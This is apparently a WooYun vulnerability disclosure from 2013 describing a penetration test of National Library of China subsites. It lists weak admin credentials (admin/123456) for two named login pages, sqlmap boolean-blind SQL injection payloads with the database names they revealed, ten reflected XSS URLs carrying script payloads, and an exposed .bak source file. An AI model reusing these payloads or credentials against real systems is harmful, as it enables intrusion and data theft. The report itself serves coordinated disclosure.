当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045773

漏洞标题:国家图书馆##国家图书馆多个分站的简单渗透测试

相关厂商:国家图书馆

漏洞作者: HackBraid

提交时间:2013-12-13 19:34

修复时间:2014-01-27 19:35

公开时间:2014-01-27 19:35

漏洞类型:账户体系控制不严

危害等级:中

自评Rank:6

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-13: 细节已通知厂商并且等待厂商处理中
2013-12-17: 厂商已经确认,细节仅向厂商公开
2013-12-27: 细节向核心白帽子及相关领域专家公开
2014-01-06: 细节向普通白帽子公开
2014-01-16: 细节向实习白帽子公开
2014-01-27: 细节向公众公开

简要描述:

前几天翻着道哥的web安全,看着看着突然想到了一种找SQL注入点的方法,于是开始测试国家图书馆的分站点,果其不然!

详细说明:

##################################后台弱口令两枚##################################
这个是验证是否为弱口令时,提示输入6~10位密码,然后admin/123456成功登入
1.http://cct.nlc.gov.cn/login.aspx
2.http://clc5.nlc.gov.cn/login.aspx

g1.jpg


g2.jpg


g3.jpg


#################################SQL注入一枚######################################
前几天翻开道哥的白帽子讲web安全,越看越觉得讲的那个深,其中的一句话引起了我的反思。
XSS本质上是一种针对HTML的注入攻击
那么通过简单测试得到的一些反射型xss点是不是可能就存在SQL注入呢?通过下面站点测试发现是可以的(不保证通用性)
##test
1.工具测试存在的XSS点:http://wenjin.nlc.gov.cn:80/2005/jj.jsp?bookid=2000112_86";alert(123);"
2.提取url:http://wenjin.nlc.gov.cn:80/2005/jj.jsp?bookid=2000112_86
存在SQL注入!当前的user和数据库名为:

Place: GET
Parameter: bookid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flagtime=2007-09-27 00:00:00&bookid=2000117_03' AND 3459=3459 AND 'MCAl'='MCAl
---
current user:    'wenjin@%'


Place: GET
Parameter: bookid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flagtime=2007-09-27 00:00:00&bookid=2000117_03' AND 3459=3459 AND 'MCAl'='MCAl
---
available databases [1]:
[*] bookaward2007


这个想法其实在今天下午发的如家#莫泰168官网多处漏洞(http://www.wooyun.org/bugs/wooyun-2013-045757/trace/11f97d9d7910c6527cf2b10622164994)已经想到了,那个Html的注入点就是从一个反射型xss中截取出来的,这样就有两个漏洞可以证明我的这个想法的部分可行性。
#################################XSS注入十枚######################################
##http://wap.nlc.gov.cn##这个XSS测试SQL注入失败了,说明通用性还是不够,仅能作为参考
1.http://wap.nlc.gov.cn/readers/login?vt=3&backurl=http%253A%20%20%252F%252Fwap.nlc.gov.cn%252Freaders%252Findex%253Fnlcsid%20%20%253Dced98f81-3584-49e7-8ec6-c4ffa06b7646%2526vt%20%20%253D3%2526sesv%253D0%22%3E%3Cscript%3Ealert%28123%29;%3C/sCript%3E
2.http://wap.nlc.gov.cn:80/messageboards/index?vt=3&sesv=0&nlcsid=ced98f81-3584-49e7-8ec6-c4ffa06b7646"><script>alert(123);</sCript>
3.http://wap.nlc.gov.cn:80/wenjin/index?vt=3&sesv=0&nlcsid=ced98f81-3584-49e7-8ec6-c4ffa06b7646"><script>alert(123);</sCript>
4.http://wap.nlc.gov.cn:80/readers/reg?vt=3&sesv=0&nlcsid=ced98f81-3584-49e7-8ec6-c4ffa06b7646"><script>alert(123);</sCript>
5.http://wap.nlc.gov.cn:80/readers/login?vt=3&sesv=0&nlcsid=ced98f81-3584-49e7-8ec6-c4ffa06b7646"><script>alert(123);</sCript>
6.http://wap.nlc.gov.cn:80/opacsearch/simple?vt=3&sesv=0&nlcsid=ced98f81-3584-49e7-8ec6-c4ffa06b7646"><script>alert(123);</sCript>
7.http://wap.nlc.gov.cn:80/opacsearch/dopresent?count=1000&page=1&base=nlc01&vt=3&set_number=871533&keyword=%E7%BA%A2%E6%A5%BC%E6%A2%A6</title></head><body><script>alert(123);</sCript>
##http://wenjin.nlc.gov.cn##
1.http://wenjin.nlc.gov.cn:80/2007/singletpvalid.jsp?bookid=2000117_03&flagtime=2007-09-27%2000:00:00"><script>alert(123);</sCript>
2.http://wenjin.nlc.gov.cn:80/2005/singletpvalid.jsp?bookid=2000112_86"><script>alert(123);</sCript>
3.http://wenjin.nlc.gov.cn:80/2007/singletpvalid.jsp?flagtime=2007-09-27%2000:00:00&bookid=2000117_03"><script>alert(123);</sCript>
###########################源码泄露部分敏感息####################################
http://wenjin.nlc.gov.cn:80/2007/jj.jsp.bak
验证用户的visitor.jsp 与SQL注入那个点基本相同

gg1.jpg


与book有关的字段:

gg2.jpg

漏洞证明:

修复方案:

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2013-12-17 20:48

厂商回复:

CNVD确认并复现所述情况,已经由CNVD直接协调国家图书馆进行处置。按多个漏洞进行评分,rank 14

最新状态:

暂无